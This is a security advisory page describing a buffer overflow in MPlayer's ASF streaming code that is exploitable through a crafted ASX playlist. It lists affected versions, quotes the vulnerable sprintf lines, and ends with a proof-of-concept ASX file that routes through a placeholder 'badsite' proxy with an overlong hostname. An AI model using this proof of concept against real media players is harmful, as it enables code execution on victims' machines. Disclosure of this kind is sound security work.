SecuriTeam - MPlayer Buffer Overflow (asf

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam
Beyond Security

SecuriTeam Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

A remotely exploitable buffer overflow vulnerability was found in MPlayer. A malicious host can craft a harmful ASX header, and trick MPlayer into executing arbitrary code upon parsing that header.

Credit:
The information has been provided by Otero, Hernan.

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
* MPlayer 0.90pre series
* MPlayer 0.90rc series
* MPlayer 0.90
* MPlayer 0.91
* MPlayer 1.0pre1

Immune systems:
* MPlayer releases before 0.90pre1
* MPlayer 0.92
* MPlayer HEAD CVS

In the source tree there is a file called asf_streaming.c this file has a function named asf_http_request, that function has two buffer overflows, this overflows are in the sprintf lines.

asf_http_request {
char str[250];
....
...
..
sprintf( str, "Host: %s:%d", server_url->hostname,
server_url->port );
....
...
..
sprintf( str, "Host: %s:%d", url->hostname, url->port );

....
...
..
}

This, at a first look, may look as it can?t be exploited ( because the MAXHOSTLEN size restriction ), however, if in an ASX file like this with a "badsite" listening in "badport" send "\n\n" as answer you could lead to a fully controllable EIP buffer overflow.

Patch availability:
A patch is available for all vulnerable versions here.

Exploit:
<asx version = "3.0">
<title>Bas Site ASX</title>

<moreinfo href = "mailto:info@badsite.com <mailto:info@badsite.com>" />
<logo href = "http://www.badsite.com/streaming/grupo.gif <http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/ <http://www.badsite.com/> " /> </banner>

<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>? All by the news</COPYRIGHT>
<ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://badsite.com/streaming/grupo.gif> " style="ICON" />
</entry>
</asx>

	Motorola Timbuktu Pro Stack Based Buffer Overflow
	Unisys Business Information Server Stack Buffer Overflow
	Adobe Shockwave Player Director File Parsing Pointer Overwrite
	Cisco Physical Access Gateway Denial of Service Vulnerability
	Cisco ASA Web VPN Multiple Vulnerabilities
	Cisco Video Surveillance Products Denial of Service
	Apple Safari File Protocol Handler Information Disclosure and Denial of Service
	HP OpenView Network Node Manager Execution of Arbitrary Code and DoS
	Kaspersky PDF Evasion All Products
	Ikarus Multiple Generic Evasions Using CAB ZIP or RAR Files
	FRISK Fprot Generic Bypass Using TAR Files
	CA Service Desk Tomcat Cross Site Scripting Vulnerability
	Apple Java CColorUIResource Pointer Derference Code Execution Vulnerability
	Mozilla Firefox Java Applet Loading Vulnerability
	Adobe Reader/Acrobat TrueType Font Processing Memory Corruption